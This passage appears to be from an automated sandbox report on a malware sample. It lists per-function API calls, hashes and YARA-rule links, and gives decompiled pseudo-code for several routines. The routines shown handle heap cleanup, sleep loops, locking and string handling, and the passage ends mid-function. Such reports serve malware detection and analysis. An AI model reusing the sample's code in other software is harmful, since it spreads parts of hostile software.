                                                            • Instruction Fuzzy Hash: 93F06D32605520EBDB211A78FC8CB5A7F55FB097A1F115536FE19F6190CA252C44FAA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581AD6, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,04561C68), ref: 04581ADB
                                                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04581AF0
                                                            • wsprintfA.USER32 ref: 04581B0C
                                                              • Part of subcall function 0457A976: memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 0457A976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                              • Part of subcall function 0457A976: wcstombs.NTDLL ref: 0457A9CE
                                                              • Part of subcall function 0457A976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                              • Part of subcall function 0457A976: TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA88
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04581B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                            • String ID:
                                                            • API String ID: 1624158581-0
                                                            • Opcode ID: 7a5570f0b3cb6943e8a53514f82562a0b9f3ce991d9dd4d7d81884c49937dd17
                                                            • Instruction ID: ff5b0cd353b2b72a70faa56f3ff598279383ea298a1012725cfb1e4897f8c95d
                                                            • Opcode Fuzzy Hash: 7a5570f0b3cb6943e8a53514f82562a0b9f3ce991d9dd4d7d81884c49937dd17
                                                            • Instruction Fuzzy Hash: CAF09032600111ABC221162ABC08F5B3AADFFC2761F151128F501F6292DE28DC5AAA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04563C61, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04563C6A
                                                            • Sleep.KERNEL32(0000000A,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04563C74
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04563C9C
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04563CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 20f34a8ae6e674ef9aa0a0450a9f1a15acf65b8cad27e419fdf19de15f69002a
                                                            • Instruction ID: edf7a33dcc13bc149d7a0291e2a8f7487a4835fcf7957a7208efa7d8679b183b
                                                            • Opcode Fuzzy Hash: 20f34a8ae6e674ef9aa0a0450a9f1a15acf65b8cad27e419fdf19de15f69002a
                                                            • Instruction Fuzzy Hash: 71F0B774201241DBE7219B66E848F1A3BA8FF11745F549408F846EB292CE28EC58FA25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD38BC, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD38BC() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xdda2c4; // 0x24c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xdda308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xdda2c4; // 0x24c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xdda290; // 0x35d0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                            0x00dd38bc
                                                            0x00dd38c3
                                                            0x00dd390d
                                                            0x00dd390f
                                                            0x00dd390f
                                                            0x00dd38c7
                                                            0x00dd38cd
                                                            0x00dd38d2
                                                            0x00dd38d6
                                                            0x00dd38dc
                                                            0x00dd38e3
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd38e5
                                                            0x00dd38ea
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd38ea
                                                            0x00dd38ec
                                                            0x00dd38f4
                                                            0x00dd38f7
                                                            0x00dd38f7
                                                            0x00dd38fd
                                                            0x00dd3904
                                                            0x00dd3907
                                                            0x00dd3907
                                                            0x00000000

                                                            APIs
                                                            • SetEvent.KERNEL32(0000024C,00000001,00DD699F), ref: 00DD38C7
                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 00DD38D6
                                                            • CloseHandle.KERNEL32(0000024C), ref: 00DD38F7
                                                            • HeapDestroy.KERNEL32(035D0000), ref: 00DD3907
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseDestroyEventHandleHeapSleep
                                                            • String ID:
                                                            • API String ID: 4109453060-0
                                                            • Opcode ID: aa89585bfa43f4e13cd714ef317ab011e3b63c159bed3dc758120e142fafd108
                                                            • Instruction ID: 80798f6e05e4979ebfa990fbc3d4117020e71963c277dd6dd68b2db4dc1ea5c3
                                                            • Opcode Fuzzy Hash: aa89585bfa43f4e13cd714ef317ab011e3b63c159bed3dc758120e142fafd108
                                                            • Instruction Fuzzy Hash: FCF01535B433159BDB20AB79BD58F567BACAB04B61B094112B804E33A4CA26C9049AB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD25ED, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E00DD25ED(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xdda37c; // 0x39c9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xdda37c; // 0x39c9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xdda030) {
					HeapFree( *0xdda290, 0, _t8);
				}
				_t13[1] = E00DD6BD2(_v0, _t13);
				_t10 =  *0xdda37c; // 0x39c9630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}










                                                            0x00dd25ed
                                                            0x00dd25ed
                                                            0x00dd25f6
                                                            0x00dd2606
                                                            0x00dd2606
                                                            0x00dd260b
                                                            0x00dd2610
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2600
                                                            0x00dd2600
                                                            0x00dd2612
                                                            0x00dd2616
                                                            0x00dd2628
                                                            0x00dd2628
                                                            0x00dd2638
                                                            0x00dd263b
                                                            0x00dd2640
                                                            0x00dd2644
                                                            0x00dd264a

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD25F6
                                                            • Sleep.KERNEL32(0000000A,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2600
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2628
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD2644
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 475578895b0e2f559986d7afec8d75c92e152a73d6d53735abde0dc7875b8c07
                                                            • Instruction ID: c880c1a399b356ab555ce364d7dfc0b3c9338e29ac29b314bb698125c4c126a9
                                                            • Opcode Fuzzy Hash: 475578895b0e2f559986d7afec8d75c92e152a73d6d53735abde0dc7875b8c07
                                                            • Instruction Fuzzy Hash: 75F0F870206340ABE7219F6DED49F267BA5EF14740B088417F596D6371C631E850DB36
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04570FF1, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04570FFA
                                                            • Sleep.KERNEL32(0000000A,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04571004
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04571032
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04571047
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: f1b6bd92b9136e3d595a0528bd2d1dbd981ae65193793874bb2b9df32f944dd8
                                                            • Instruction ID: 490726e54d41dc7d0a36c4b11dcb7021e692b2fef7d10f31a4334f818c667cd4
                                                            • Opcode Fuzzy Hash: f1b6bd92b9136e3d595a0528bd2d1dbd981ae65193793874bb2b9df32f944dd8
                                                            • Instruction Fuzzy Hash: 91F0B274201240DBE7198B64E899F2937A4FB04705F54502DE846AB391DA38EC08FA25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD1000, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00DD1000() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xdda37c; // 0x39c9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xdda37c; // 0x39c9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xdda37c; // 0x39c9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xddb85e) {
					HeapFree( *0xdda290, 0, _t10);
					_t7 =  *0xdda37c; // 0x39c9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                            0x00dd1000
                                                            0x00dd1009
                                                            0x00dd1019
                                                            0x00dd1019
                                                            0x00dd101e
                                                            0x00dd1023
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1013
                                                            0x00dd1013
                                                            0x00dd1025
                                                            0x00dd102a
                                                            0x00dd102e
                                                            0x00dd1041
                                                            0x00dd1047
                                                            0x00dd1047
                                                            0x00dd1050
                                                            0x00dd1052
                                                            0x00dd1056
                                                            0x00dd105c

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD1009
                                                            • Sleep.KERNEL32(0000000A,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD1013
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD1041
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD1056
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 27570890a41bdabff20c3a18e9cf9eb9fa021c5f8f147046f9ee67989e98c2f1
                                                            • Instruction ID: feab78eb4268e47c8b2a9eff57b28f4c7aa1e10a0db767962510c45f96d6a959
                                                            • Opcode Fuzzy Hash: 27570890a41bdabff20c3a18e9cf9eb9fa021c5f8f147046f9ee67989e98c2f1
                                                            • Instruction Fuzzy Hash: 79F09E78242340EFE718EF69ED99A3577A5EB48701B05801BE906D7375C735EC80DA35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457864A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,?,?), ref: 0457868E
                                                            • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 045786A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 0x
                                                            • API String ID: 3510742995-3225541890
                                                            • Opcode ID: 714db011c64913f08e31f715f9e7bbcc3f27cd59ac048c2d6d08957a3ae054f3
                                                            • Instruction ID: fd82e6e14e1eb08a792fe001e415160173b8e4a3544dd5a5ff76de67876f1af7
                                                            • Opcode Fuzzy Hash: 714db011c64913f08e31f715f9e7bbcc3f27cd59ac048c2d6d08957a3ae054f3
                                                            • Instruction Fuzzy Hash: E8017135900219BBDB01EFA8D849AEEBBB9FB54308F144465E914F7210EB74EA09DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457969C, Relevance: 5.2, APIs: 4, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04582C28,00000800,?,?,00000000,00000000), ref: 045798DD
                                                              • Part of subcall function 0456F7AF: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,045797AB,?,?,?,00000000,00000000), ref: 0456F7D4
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F7F6
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F80C
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F822
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F838
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F84E
                                                              • Part of subcall function 045685E6: memcpy.NTDLL(?,?,?,?,?,?,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 0456864C
                                                              • Part of subcall function 045685E6: memcpy.NTDLL(00000000,?,?), ref: 045686AB
                                                            • memcpy.NTDLL(?,?,?,?,?,0456DC59,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 0457980A
                                                            • memcpy.NTDLL(?,?,00000018,?,?,0456DC59,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 04579856
                                                            • memset.NTDLL ref: 0457995D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcmemcpy$HandleModulememset
                                                            • String ID:
                                                            • API String ID: 2847270571-0
                                                            • Opcode ID: aec84ed5c803cd860d6d2780bc6314a8cbf2fbb2cec9febdc4d9a94fc6f83ea3
                                                            • Instruction ID: 61bde88a917c5f9869fd2568daccd039359193edb192574c384b59b0b1188001
                                                            • Opcode Fuzzy Hash: aec84ed5c803cd860d6d2780bc6314a8cbf2fbb2cec9febdc4d9a94fc6f83ea3
                                                            • Instruction Fuzzy Hash: DD913FB190020AEFEF11DF98E984AAEB7B5FF04304F144569E811A7251E735BA54EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561D77, Relevance: 5.2, APIs: 4, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04561DD6
                                                            • CloseHandle.KERNEL32(?,?,00000100,?,?), ref: 04561E24
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000094,045671A5,00000000,?,04561D00,00000000,?,0456B6F6,00000000,?,0456A4A1,00000000), ref: 04562168
                                                            • GetLastError.KERNEL32(?,?), ref: 045623AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 2333114656-0
                                                            • Opcode ID: d22b62b3312275fd6a619e3cbe0a7f0443162ec908890f0e9c75b3a1dc7f58ed
                                                            • Instruction ID: 206019c549d5bdf094aa807def705eb5662e0419dd7d04120dd340891aac2723
                                                            • Opcode Fuzzy Hash: d22b62b3312275fd6a619e3cbe0a7f0443162ec908890f0e9c75b3a1dc7f58ed
                                                            • Instruction Fuzzy Hash: 5B412532304205FAEB217E69DC45FAB3B79BB84754F0044A2B903A7140EB71F951BBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577629, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 0457764F
                                                            • memcpy.NTDLL ref: 04577677
                                                              • Part of subcall function 04564173: RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                              • Part of subcall function 04564173: SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            • GetLastError.KERNEL32(00000010,00000218,04584EAD,00000100,?,00000318,00000008), ref: 0457768E
                                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04584EAD,00000100), ref: 04577771
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Last$Statusmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1706616652-0
                                                            • Opcode ID: 3d10bb9ffbb63cd0152efac715006565da4ff4d0131f6c5ff71b533f035f28e2
                                                            • Instruction ID: d721ef96f461bac33edc09516f140d36b6fd11765abc880135376f4786452b00
                                                            • Opcode Fuzzy Hash: 3d10bb9ffbb63cd0152efac715006565da4ff4d0131f6c5ff71b533f035f28e2
                                                            • Instruction Fuzzy Hash: 0D4162B1504302AFD760EF28ED41FABB7E9BB88314F00492DF599D6250EB70F5149BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04573945, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0456A27C: lstrlen.KERNEL32(00000000,?,?), ref: 0456A2D5
                                                              • Part of subcall function 0456A27C: lstrlen.KERNEL32(?,?,?), ref: 0456A2F3
                                                              • Part of subcall function 0456A27C: RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 0456A31C
                                                              • Part of subcall function 0456A27C: memcpy.NTDLL(00000000,00000000,00000000), ref: 0456A333
                                                              • Part of subcall function 0456A27C: HeapFree.KERNEL32(00000000,00000000), ref: 0456A346
                                                              • Part of subcall function 0456A27C: memcpy.NTDLL(00000000,?,?), ref: 0456A355
                                                            • GetLastError.KERNEL32 ref: 045739E4
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567306
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 0456732A
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567338
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04573A00
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04573A11
                                                            • SetLastError.KERNEL32(00000000), ref: 04573A14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                            • String ID:
                                                            • API String ID: 2451549186-0
                                                            • Opcode ID: 3242239ad62c3d05afcae014f73c806502ba88ea274b7f1de94905c710b37c5d
                                                            • Instruction ID: 7adf0023e1ddd9463f53ce237e3d403e9de51a21cab796a778b6bfceef66bd97
                                                            • Opcode Fuzzy Hash: 3242239ad62c3d05afcae014f73c806502ba88ea274b7f1de94905c710b37c5d
                                                            • Instruction Fuzzy Hash: F5312B31900109FFCF129F99E84089EBFB9FF84764B10416AF916A2161C736AA51FF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A2C9, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457BDCC: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?), ref: 0457BDF0
                                                              • Part of subcall function 0457BDCC: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457BE02
                                                              • Part of subcall function 0457BDCC: wcstombs.NTDLL ref: 0457BE10
                                                              • Part of subcall function 0457BDCC: lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE34
                                                              • Part of subcall function 0457BDCC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457BE49
                                                              • Part of subcall function 0457BDCC: mbstowcs.NTDLL ref: 0457BE56
                                                              • Part of subcall function 0457BDCC: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE68
                                                              • Part of subcall function 0457BDCC: HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE82
                                                            • GetLastError.KERNEL32 ref: 0457A368
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567306
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 0456732A
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567338
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A384
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A395
                                                            • SetLastError.KERNEL32(00000000), ref: 0457A398
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 3867366388-0
                                                            • Opcode ID: 4b3bd0a9892c9fcd66b4e05c02a7b0bc1638316a4ef3cfc9d8c1ddafe1af121c
                                                            • Instruction ID: 01d0c472339a2728729cb80d945c712a7e6e2627dc6ee67119db290c57448417
                                                            • Opcode Fuzzy Hash: 4b3bd0a9892c9fcd66b4e05c02a7b0bc1638316a4ef3cfc9d8c1ddafe1af121c
                                                            • Instruction Fuzzy Hash: 9D314932900108FFCF129FA9EC4089EBFB9FF48310B14416AF915A6161CB35AE61EF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045668AD, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: b0c542d6bd1a6fdc8c9b01d283d2f5f2ab0c507d3e6c40ff4af7d90c3437e17f
                                                            • Instruction ID: 664ec23000ef09d77887918f76c0f5d58c628c3781e485311fa659375ebd17f8
                                                            • Opcode Fuzzy Hash: b0c542d6bd1a6fdc8c9b01d283d2f5f2ab0c507d3e6c40ff4af7d90c3437e17f
                                                            • Instruction Fuzzy Hash: AE21A2B260050ABBDB219F61FC84A667B39FF09318B040529ED4697C11D732F8B1EBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575CE8, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A), ref: 04575CF4
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 045845A5: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,04575D22,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60), ref: 045845B3
                                                              • Part of subcall function 045845A5: StrChrA.SHLWAPI(00000000,0000003F,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A,00000008,0457B24C), ref: 045845BD
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04575D52
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04575D62
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04575D6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 891c4818af65a63f242be57bce9679bcd6b04b2e8d12455d34be51fa480a2e7d
                                                            • Instruction ID: 7b1490cb45decae1783a00dfd8de732f6fc106e1da0e6dd9af930d0e8fcb48dd
                                                            • Opcode Fuzzy Hash: 891c4818af65a63f242be57bce9679bcd6b04b2e8d12455d34be51fa480a2e7d
                                                            • Instruction Fuzzy Hash: 8721967150025AFFDB12AF64D848A9E7FA9FF56654F048064EC05AF101EB35EA05A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4EEF, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E00DD4EEF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00DD77D7(_t2);
				if(_t34 != 0) {
					_t30 = E00DD77D7(_t28);
					if(_t30 == 0) {
						E00DD77EC(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00DD783A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00DD783A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
